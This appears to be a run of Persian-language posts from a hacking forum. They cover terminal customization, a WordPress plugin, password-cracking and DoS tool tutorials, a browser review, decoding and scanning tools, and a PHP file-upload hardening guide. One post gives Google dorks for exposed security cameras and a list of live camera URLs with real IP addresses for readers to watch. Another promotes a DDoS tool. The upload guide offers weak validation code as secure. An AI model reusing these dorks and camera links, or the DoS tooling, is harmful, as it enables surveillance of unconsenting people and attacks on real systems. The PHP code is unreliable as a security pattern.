قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  18. با سلام خدمت کاربران و مدیران گارد ایران " پست رو پیشنهاد می کنم تا آخر بخوانید . " در این پست قصد دارم یک افزونه رو به شما معرفی کنم که در خیلی جاها مورد استفاده قرار می گیرد ، افزونه BigBlueButton (برای وردپرس ) که شما می توانید با استفاده از این افزونه، کلاس انلاین ، آموزش های آنلاین و ... برگذار کنید ؛ تقریبا نود درصد از امکانات یک کلاس آنلاین (اسکای روم و...) رو دارد و میزان عملکردش هم میشه گفت متوسطه رو به بالا هست و ترافیک خوبی دارد . بهتون پیشنهاد می کنم . این افزونه رایگان است و فقط کافی در وردپرس عبارت BigBlueButton رو جست و جو کنید و افزونه رو دانلود کنید . استفاده کردن ازش خیلی ساده هست و دو نوع دسترسی دارد : استاد و دانشجو ؛ اگر بخواهم ویژگی هاش رو بگم پست خیلی طولانی میشود خودتون بروید و ببینید . یک نکته در رابطه با ترافیک : چند روز پیش این افزونه رو برای یک دانشگاه گذاشتم که ۳ کلاس تقریبا ۲۰ نفره در یک ساعت داشت برگذار می شد و گزارش دادن که بعضی دانشجویان صفحه برایشان لود نمی شد و با فیلتر شکن وارد شدن این نکته رو گفتم که اگر یک نفر با این مشکل روبرو شد نگران نباشد . "امیدوارم لذت برده باشید و خوشتون اومده باشه ." bigbluebutton.zip
  19. با سلام خدمت دوستان سوالاتی که در رابطه با MSACMS هست رو در اینجا بپرسید . اگر کسی با MSACMS اشنایی ندارد این تاپیک رو تا اخر بخونه :‌
  20. در این تاپیک دورک دوربین های مداربسه رو قرار دادم براتون و یه سری دوربین مداربسته که می توانید راحت تماشا کنید . inurl:"view.shtml" "Network Camera" "Camera Live Image" inurl:"guestimage.html" inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera" intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control" inurl:"MultiCameraFrame?Mode=Motion" intitle:"IP CAMERA Viewer" intext:"setting | Client setting" allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera " Display Cameras intitle:"Express6 Live Image" intitle:"Orite IC301" camera linksys inurl:main.cgi دورک های زیادی در سایت های مختلف هست ولی این ها رو دونه دونه چک کردم تا بتوانید راحت تر استفاده کنید . این دوربین های مداربسته رو از همون دورک ها بدست اوردم و همین الان لینک ها چک شده . http://corp.glaztech.com:83/m/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Standard&Interval=30&Size=STD&PresetOperation=Move&Language=4 http://82.62.121.150/cgi-bin/guestimage.html http://75.145.165.113:86/ViewerFrame?Mode=Motion&Language=4 http://wwww.kelhess.com:82/ViewerFrame?Mode=Refresh&Language=4 http://130.191.35.82/live.htm http://184.185.210.241/ViewerFrame?Mode=Motion&Language=0 http://129.2.122.140/view/index.shtml http://99.43.4.246/main.cgi?next_file=main2.htm "منبع : exploit-db.com " امیدوارم لذت برده باشید ، دونه دونه لینک چک کردن سخت هست تشکر فراموش نشه لطفا . 😄 موفق و پیروز باشید .
  21. MR.MSA

    آموزش ابزار john

    با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
  22. با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  23. MR.MSA

    برسی مرورگرها

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  24. MR.MSA

    2 ابزار کاربردی

    در این تاپیک قصد دارم به شما دو ابزار رو در هک آموزش بدهم . ابزار اول BaseCrack : این ابزار برای دیکد است و از سرعت بالایی برخوردار است و شما می توانید با پایتون ۲ و ۳ این ابزار رو روی سیستم عاملتون اجرا کنید . روش کار به این صورت است که شما یک فایل حاوه ی متن های کدگذاری شده رو بهش میدید و BaseCrack در کمترین زمان برای شما دیکدش می کند . encode های قابل decode : Base16 Base32 Base36 Base58 Base62 Base64 Base64Url Base85 Base91 Base92 نحوه استفاده :‌ ابتدا با این دستورات پیش نیاز های ابزار را نصب می کنیم . git clone https://github.com/mufeedvh/basecrack.git cd basecrack pip install -r requirements.txt -------------- ---------- ------------ ------------ ------------ ------------ ------------ سپس با پایتون ابزار را اجرا می کنیم . python basecrack.py -------------- ---------- ------------ ------------ ------------ ------------ ------------ می توانید برای راهنمایی از سویچ -h هم استفاده کنید : python basecrack.py -h -------------- ---------- ------------ ------------ ------------ ------------ ------------ برای رمزگشایی یک آرگومان از سویچ -b/--base استفاده می کنیم . به این صورت : python basecrack.py -b SGVsbG8gV29ybGQh -------------- ---------- ------------ ------------ ------------ ------------ ------------ برای رمزگشایی چندین رمزگذاری که در یک فایل دارید با سویچ -f و یا --file نکته به جای file.txt ادرس فایل را بنویسید . به این صورت : python basecrack.py -f file.txt و برای اینکه دیکد شده ها در یک فایل قرار گیرند ‌از --output یا -o استفاده می کنیم . python basecrack.py -f file.txt -o output-wordlist.txt -------------- ---------- ------------ ------------ ------------ ------------ ------------ ابزار دوم masscan : برای ابزار دوم یک ویدئو ضبط کردم که می توانید مشاهده کنید . (در یوتیوب اپلود شده و با vpn مشاهده کنید . ) امیدوارم لذت ببرید . (خوش باشید 😁)
  25. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip